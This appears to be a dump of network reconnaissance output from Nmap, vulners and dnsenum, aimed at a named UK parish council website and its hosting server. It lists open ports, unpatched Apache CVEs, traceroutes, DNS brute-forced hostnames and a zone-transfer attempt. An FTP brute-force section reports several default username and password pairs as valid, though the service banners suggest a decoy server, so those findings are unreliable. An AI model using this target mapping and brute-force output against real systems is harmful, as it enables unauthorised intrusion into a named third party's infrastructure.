- | CVE-2010-3867 7.1 https://vulners.com/cve/CVE-2010-3867
- | CVE-2010-4652 6.8 https://vulners.com/cve/CVE-2010-4652
- | CVE-2009-0543 6.8 https://vulners.com/cve/CVE-2009-0543
- | CVE-2009-3639 5.8 https://vulners.com/cve/CVE-2009-3639
- | CVE-2011-1137 5.0 https://vulners.com/cve/CVE-2011-1137
- | CVE-2008-7265 4.0 https://vulners.com/cve/CVE-2008-7265
- |_ CVE-2012-6095 1.2 https://vulners.com/cve/CVE-2012-6095
- |_vulscan: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|specialized|storage-misc
- Running (JUST GUESSING): Linux 3.X|4.X (91%), Crestron 2-Series (87%), HP embedded (85%), Oracle VM Server 3.X (85%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:oracle:vm_server:3.4.2 cpe:/o:linux:linux_kernel:4.1
- Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.18 (87%), Crestron XPanel control system (87%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%), Oracle VM Server 3.4.2 (Linux 4.1) (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 16 hops
- Service Info: OS: Unix
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 120.87 ms 10.245.204.1
- 2 152.66 ms R43.static.amanah.com (104.245.144.129)
- 3 152.76 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 152.78 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 152.74 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 152.76 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 206.49 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 152.79 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 124.99 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 174.64 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 174.65 ms be10.asr02.dc5.as20860.net (130.180.202.47)
- 14 174.68 ms po256.net2.north.dc5.as20860.net (130.180.203.6)
- 15 174.65 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 174.56 ms pegasus.terrassl.net (89.145.78.0)
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:41 EDT
- NSE: Loaded 164 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 03:41
- Completed NSE at 03:41, 0.00s elapsed
- Initiating NSE at 03:41
- Completed NSE at 03:41, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 03:41
- Completed Parallel DNS resolution of 1 host. at 03:41, 0.03s elapsed
- Initiating SYN Stealth Scan at 03:41
- Scanning www.mundesley-pc.gov.uk (89.145.78.0) [1 port]
- Discovered open port 443/tcp on 89.145.78.0
- Completed SYN Stealth Scan at 03:41, 0.15s elapsed (1 total ports)
- Initiating Service scan at 03:41
- Scanning 1 service on www.mundesley-pc.gov.uk (89.145.78.0)
- Completed Service scan at 03:41, 13.53s elapsed (1 service on 1 host)
- Initiating OS detection (try #1) against www.mundesley-pc.gov.uk (89.145.78.0)
- Retrying OS detection (try #2) against www.mundesley-pc.gov.uk (89.145.78.0)
- Initiating Traceroute at 03:41
- Completed Traceroute at 03:41, 0.36s elapsed
- Initiating Parallel DNS resolution of 16 hosts. at 03:41
- Completed Parallel DNS resolution of 16 hosts. at 03:41, 0.27s elapsed
- NSE: Script scanning 89.145.78.0.
- Initiating NSE at 03:41
- NSE: [http-wordpress-enum 89.145.78.0:443] got no answers from pipelined queries
- Completed NSE at 03:49, 487.78s elapsed
- Initiating NSE at 03:49
- Completed NSE at 03:49, 2.00s elapsed
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.14s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 443/tcp open ssl/http Apache httpd 2.2.16 ((Debian))
- |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
- | http-brute:
- |_ Path "/" does not require authentication
- |_http-chrono: Request times for /; avg: 16202.77ms; min: 16170.08ms; max: 16280.27ms
- |_http-csrf: Couldn't find any CSRF vulnerabilities.
- |_http-devframework: Wordpress detected. Found common traces on /
- |_http-dombased-xss: Couldn't find any DOM based XSS.
- |_http-errors: ERROR: Script execution failed (use -d to debug)
- |_http-feed: Couldn't find any feeds.
- |_http-fetch: Please enter the complete path of the directory to save data in.
- |_http-jsonp-detection: Couldn't find any JSONP endpoints.
- |_http-mobileversion-checker: No mobile version detected.
- | http-robots.txt: 1 disallowed entry
- |_/
- | http-security-headers:
- | Strict_Transport_Security:
- | HSTS not configured in HTTPS Server
- | Cache_Control:
- | Header: Cache-Control: no-cache, no-store, must-revalidate
- | Pragma:
- | Header: Pragma: no-cache
- | Expires:
- |_ Header: Expires: 0
- | http-sitemap-generator:
- | Directory structure:
- | Longest directory structure:
- | Depth: 0
- | Dir: /
- | Total files found (by extension):
- |_
- |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
- |_http-traceroute: ERROR: Script execution failed (use -d to debug)
- | http-vhosts:
- | 51 names had status 403
- |_76 names had status ERROR
- |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
- |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
- |_http-xssed: No previously reported XSS vuln.
- | vulners:
- | cpe:/a:apache:http_server:2.2.16:
- | CVE-2011-3192 7.8 https://vulners.com/cve/CVE-2011-3192
- | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
- | CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
- | CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
- | CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
- | CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
- | CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
- | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
- | CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
- | CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
- | CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
- | CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
- | CVE-2012-4557 5.0 https://vulners.com/cve/CVE-2012-4557
- | CVE-2011-3368 5.0 https://vulners.com/cve/CVE-2011-3368
- | CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
- | CVE-2011-3607 4.4 https://vulners.com/cve/CVE-2011-3607
- | CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
- | CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
- | CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
- | CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
- | CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
- | CVE-2011-4317 4.3 https://vulners.com/cve/CVE-2011-4317
- | CVE-2011-3639 4.3 https://vulners.com/cve/CVE-2011-3639
- | CVE-2011-3348 4.3 https://vulners.com/cve/CVE-2011-3348
- | CVE-2011-0419 4.3 https://vulners.com/cve/CVE-2011-0419
- | CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
- | CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
- |_ CVE-2011-4415 1.2 https://vulners.com/cve/CVE-2011-4415
- |_vulscan: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|specialized|storage-misc
- Running (JUST GUESSING): Linux 3.X|4.X (91%), Crestron 2-Series (87%), HP embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
- Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.18 (89%), Crestron XPanel control system (87%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 16.730 days (since Mon Aug 19 10:18:22 2019)
- Network Distance: 16 hops
- TCP Sequence Prediction: Difficulty=254 (Good luck!)
- IP ID Sequence Generation: All zeros
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 119.16 ms 10.245.204.1
- 2 158.49 ms R43.static.amanah.com (104.245.144.129)
- 3 158.45 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 158.50 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 158.43 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 158.50 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 236.40 ms ae-12-3510.ear2.London15.Level3.net (4.69.167.142)
- 8 202.18 ms ae-13-3511.ear2.London15.Level3.net (4.69.167.146)
- 9 236.47 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 158.66 ms ae2.core-1.maylands.hml.uk.as29017.net (89.145.125.77)
- 11 146.79 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 194.51 ms be11.asr01.ld5.as20860.net (130.180.202.26)
- 13 160.22 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 194.34 ms po256.net2.north.dc5.as20860.net (130.180.203.6)
- 15 194.28 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 194.33 ms pegasus.terrassl.net (89.145.78.0)
- NSE: Script Post-scanning.
- Initiating NSE at 03:49
- Completed NSE at 03:49, 0.00s elapsed
- Initiating NSE at 03:49
- Completed NSE at 03:49, 0.00s elapsed
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:55 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up.
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 3306/tcp filtered mysql
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 64.50 ms 10.245.204.1
- 2 96.22 ms R43.static.amanah.com (104.245.144.129)
- 3 96.32 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 96.34 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 96.31 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 96.33 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 160.48 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 128.35 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 121.24 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 176.73 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 176.66 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 144.44 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 176.66 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:55 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up.
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 5432/tcp filtered postgresql
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 117.53 ms 10.245.204.1
- 2 149.44 ms R43.static.amanah.com (104.245.144.129)
- 3 149.53 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 149.55 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 149.51 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 149.54 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 226.90 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 149.68 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 137.32 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 185.30 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 185.24 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 185.18 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 185.24 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 03:58 EDT
- Nmap scan report for www.mundesley-pc.gov.uk (89.145.78.0)
- Host is up.
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE VERSION
- 6667/tcp filtered irc
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 64.60 ms 10.245.204.1
- 2 96.43 ms R43.static.amanah.com (104.245.144.129)
- 3 96.48 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
- 4 96.52 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41)
- 5 96.54 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
- 6 96.51 ms level3.yyz02.atlas.cogentco.com (154.54.11.210)
- 7 ... 8
- 9 172.20 ms GYRON-INTER.ear2.London15.Level3.net (64.209.96.150)
- 10 172.21 ms ae2.core-2.maylands.hml.uk.as29017.net (89.145.125.69)
- 11 133.51 ms 83-223-96-111.as29017.net (83.223.96.111)
- 12 200.21 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 13 200.13 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 14 165.86 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 15 200.16 ms 1-103-223-83.xssl.net (83.223.103.1)
- 16 ... 30
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- 89.145.78.0 -----
- Host's addresses:
- __________________
- Name Servers:
- ______________
- dns3.xssl.net. 1800 IN A 217.194.223.66
- dns1.xssl.net. 1799 IN A 82.145.61.87
- dns2.xssl.net. 1800 IN A 185.181.126.158
- Mail (MX) Servers:
- ___________________
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for 89.145.78.0 on dns3.xssl.net ...
- Trying Zone Transfer for 89.145.78.0 on dns1.xssl.net ...
- Trying Zone Transfer for 89.145.78.0 on dns2.xssl.net ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:28 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up (0.19s latency).
- Not shown: 451 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 19/tcp open chargen
- 21/tcp open ftp
- 23/tcp open telnet
- 53/tcp open domain
- 79/tcp open finger
- 80/tcp open http
- 137/tcp open netbios-ns
- 407/tcp open timbuktu
- 443/tcp open https
- 617/tcp open sco-dtmgr
- 1158/tcp open lsnr
- 1720/tcp open h323q931
- 1723/tcp open pptp
- 2000/tcp open cisco-sccp
- 2222/tcp open EtherNetIP-1
- 5000/tcp open upnp
- 5432/tcp open postgresql
- 5900/tcp open vnc
- 6106/tcp open isdninfo
- 6667/tcp open irc
- 7000/tcp open afs3-fileserver
- 8080/tcp open http-proxy
- 8686/tcp open sun-as-jmxrmi
- 8899/tcp open ospf-lite
- 9002/tcp open dynamid
- 9010/tcp open sdr
- 10008/tcp open octopus
- 12345/tcp open netbus
- 22222/tcp open easyengine
- Nmap done: 1 IP address (1 host up) scanned in 13.16 seconds
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:29 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up (0.15s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 500/udp open|filtered isakmp
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:29 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up (0.24s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp?
- | fingerprint-strings:
- | DNSStatusRequestTCP, DNSVersionBindReqTCP, JavaRMI, LANDesk-RC, LDAPBindReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, TerminalServer, X11Probe:
- | 220 BitNinja FTP CAPTCHA server
- | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
- | 220 BitNinja FTP CAPTCHA server
- |_ logged in.
- |_ftp-bounce: bounce working!
- | ftp-brute:
- | Accounts:
- | admin:admin - Valid credentials
- | sysadmin:123456 - Valid credentials
- | guest:123456 - Valid credentials
- | user:123456 - Valid credentials
- | web:123456789 - Valid credentials
- | administrator:<empty> - Valid credentials
- | netadmin:netadmin - Valid credentials
- | root:<empty> - Valid credentials
- | webadmin:webadmin - Valid credentials
- | test:123456789 - Valid credentials
- |_ Statistics: Performed 45 guesses in 11 seconds, average tps: 4.1
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port21-TCP:V=7.80%I=7%D=9/5%Time=5D70AB39%P=x86_64-pc-linux-gnu%r(NULL,
- SF:20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n")%r(GenericLines,33,"
- SF:220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n530\x20Not\x20logged\x20in
- SF:\.\n")%r(Help,33,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n530\x20N
- SF:ot\x20logged\x20in\.\n")%r(GetRequest,33,"220\x20BitNinja\x20FTP\x20CAP
- SF:TCHA\x20server\n530\x20Not\x20logged\x20in\.\n")%r(HTTPOptions,33,"220\
- SF:x20BitNinja\x20FTP\x20CAPTCHA\x20server\n530\x20Not\x20logged\x20in\.\n
- SF:")%r(RTSPRequest,33,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n530\x
- SF:20Not\x20logged\x20in\.\n")%r(RPCCheck,20,"220\x20BitNinja\x20FTP\x20CA
- SF:PTCHA\x20server\n")%r(DNSVersionBindReqTCP,20,"220\x20BitNinja\x20FTP\x
- SF:20CAPTCHA\x20server\n")%r(DNSStatusRequestTCP,20,"220\x20BitNinja\x20FT
- SF:P\x20CAPTCHA\x20server\n")%r(SSLSessionReq,33,"220\x20BitNinja\x20FTP\x
- SF:20CAPTCHA\x20server\n530\x20Not\x20logged\x20in\.\n")%r(TerminalServerC
- SF:ookie,33,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n530\x20Not\x20lo
- SF:gged\x20in\.\n")%r(TLSSessionReq,33,"220\x20BitNinja\x20FTP\x20CAPTCHA\
- SF:x20server\n530\x20Not\x20logged\x20in\.\n")%r(Kerberos,33,"220\x20BitNi
- SF:nja\x20FTP\x20CAPTCHA\x20server\n530\x20Not\x20logged\x20in\.\n")%r(SMB
- SF:ProgNeg,20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n")%r(X11Probe,
- SF:20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n")%r(FourOhFourRequest
- SF:,33,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n530\x20Not\x20logged\
- SF:x20in\.\n")%r(LPDString,33,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server
- SF:\n530\x20Not\x20logged\x20in\.\n")%r(LDAPSearchReq,33,"220\x20BitNinja\
- SF:x20FTP\x20CAPTCHA\x20server\n530\x20Not\x20logged\x20in\.\n")%r(LDAPBin
- SF:dReq,20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n")%r(SIPOptions,3
- SF:3,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n530\x20Not\x20logged\x2
- SF:0in\.\n")%r(LANDesk-RC,20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\
- SF:n")%r(TerminalServer,20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n"
- SF:)%r(NCP,20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n")%r(NotesRPC,
- SF:20,"220\x20BitNinja\x20FTP\x20CAPTCHA\x20server\n")%r(JavaRMI,20,"220\x
- SF:20BitNinja\x20FTP\x20CAPTCHA\x20server\n");
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|specialized|storage-misc
- Running (JUST GUESSING): Linux 3.X|4.X (91%), Crestron 2-Series (87%), HP embedded (85%), Oracle VM Server 3.X (85%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:oracle:vm_server:3.4.2 cpe:/o:linux:linux_kernel:4.1
- Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.18 (89%), Crestron XPanel control system (87%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%), Oracle VM Server 3.4.2 (Linux 4.1) (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 179.57 ms 10.238.204.1
- 2 190.51 ms 45.131.4.2
- 3 190.50 ms 109.236.95.226
- 4 190.54 ms 109.236.95.173
- 5 190.57 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 190.59 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 190.61 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 190.67 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 190.69 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 190.70 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 309.68 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 299.44 ms pegasus.terrassl.net (89.145.78.0)
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:33 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 23/tcp open telnet?
- | fingerprint-strings:
- | DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, RPCCheck, RTSPRequest, SSLSessionReq, tn3270:
- | This is an unrestricted telnet server.
- | Please do not user for production purposes
- | bash: command not found
- | NULL:
- | This is an unrestricted telnet server.
- |_ Please do not user for production purposes
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port23-TCP:V=7.80%I=7%D=9/5%Time=5D70AC30%P=x86_64-pc-linux-gnu%r(NULL,
- SF:58,"This\x20is\x20an\x20unrestricted\x20telnet\x20server\.\r\nPlease\x2
- SF:0do\x20not\x20user\x20for\x20production\x20purposes\r\n\r\n#\x20")%r(Ge
- SF:nericLines,74,"This\x20is\x20an\x20unrestricted\x20telnet\x20server\.\r
- SF:\nPlease\x20do\x20not\x20user\x20for\x20production\x20purposes\r\n\r\n#
- SF:\x20\x20bash:\x20command\x20not\x20found\r\n#\x20")%r(tn3270,74,"This\x
- SF:20is\x20an\x20unrestricted\x20telnet\x20server\.\r\nPlease\x20do\x20not
- SF:\x20user\x20for\x20production\x20purposes\r\n\r\n#\x20\x20bash:\x20comm
- SF:and\x20not\x20found\r\n#\x20")%r(GetRequest,74,"This\x20is\x20an\x20unr
- SF:estricted\x20telnet\x20server\.\r\nPlease\x20do\x20not\x20user\x20for\x
- SF:20production\x20purposes\r\n\r\n#\x20\x20bash:\x20command\x20not\x20fou
- SF:nd\r\n#\x20")%r(HTTPOptions,74,"This\x20is\x20an\x20unrestricted\x20tel
- SF:net\x20server\.\r\nPlease\x20do\x20not\x20user\x20for\x20production\x20
- SF:purposes\r\n\r\n#\x20\x20bash:\x20command\x20not\x20found\r\n#\x20")%r(
- SF:RTSPRequest,74,"This\x20is\x20an\x20unrestricted\x20telnet\x20server\.\
- SF:r\nPlease\x20do\x20not\x20user\x20for\x20production\x20purposes\r\n\r\n
- SF:#\x20\x20bash:\x20command\x20not\x20found\r\n#\x20")%r(RPCCheck,74,"Thi
- SF:s\x20is\x20an\x20unrestricted\x20telnet\x20server\.\r\nPlease\x20do\x20
- SF:not\x20user\x20for\x20production\x20purposes\r\n\r\n#\x20\x20bash:\x20c
- SF:ommand\x20not\x20found\r\n#\x20")%r(DNSVersionBindReqTCP,74,"This\x20is
- SF:\x20an\x20unrestricted\x20telnet\x20server\.\r\nPlease\x20do\x20not\x20
- SF:user\x20for\x20production\x20purposes\r\n\r\n#\x20\x20bash:\x20command\
- SF:x20not\x20found\r\n#\x20")%r(DNSStatusRequestTCP,74,"This\x20is\x20an\x
- SF:20unrestricted\x20telnet\x20server\.\r\nPlease\x20do\x20not\x20user\x20
- SF:for\x20production\x20purposes\r\n\r\n#\x20\x20bash:\x20command\x20not\x
- SF:20found\r\n#\x20")%r(Help,74,"This\x20is\x20an\x20unrestricted\x20telne
- SF:t\x20server\.\r\nPlease\x20do\x20not\x20user\x20for\x20production\x20pu
- SF:rposes\r\n\r\n#\x20\x20bash:\x20command\x20not\x20found\r\n#\x20")%r(SS
- SF:LSessionReq,74,"This\x20is\x20an\x20unrestricted\x20telnet\x20server\.\
- SF:r\nPlease\x20do\x20not\x20user\x20for\x20production\x20purposes\r\n\r\n
- SF:#\x20\x20bash:\x20command\x20not\x20found\r\n#\x20");
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: specialized|WAP|phone
- Running: iPXE 1.X, Linux 2.4.X|2.6.X, Sony Ericsson embedded
- OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
- OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
- TRACEROUTE (using port 23/tcp)
- HOP RTT ADDRESS
- 1 217.63 ms 10.238.204.1
- 2 217.71 ms 45.131.4.3
- 3 217.70 ms 109.236.95.226
- 4 217.75 ms 109.236.95.167
- 5 217.78 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 217.81 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 321.64 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 321.68 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 321.70 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 113.47 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 304.14 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:36 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up (0.20s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.11.4-P2-RedHat-9.11.4-9.P2.el7
- |_vulscan: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running (JUST GUESSING): Linux 3.X|4.X (90%)
- OS CPE: cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.4
- Aggressive OS guesses: Linux 3.10 (90%), Linux 3.10 - 3.16 (90%), Linux 3.10 - 3.12 (89%), Linux 4.4 (89%), Linux 4.9 (89%), Linux 4.0 (88%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | admin.terrassl.net - 95.154.210.2
- | alpha.terrassl.net - 212.113.145.34
- | ns1.terrassl.net - 217.194.210.107
- | ns2.terrassl.net - 84.22.166.196
- | ns3.terrassl.net - 84.22.166.196
- | mail.terrassl.net - 95.154.210.2
- | www.terrassl.net - 95.154.210.2
- |_ ftp.terrassl.net - 95.154.210.2
- TRACEROUTE (using port 53/tcp)
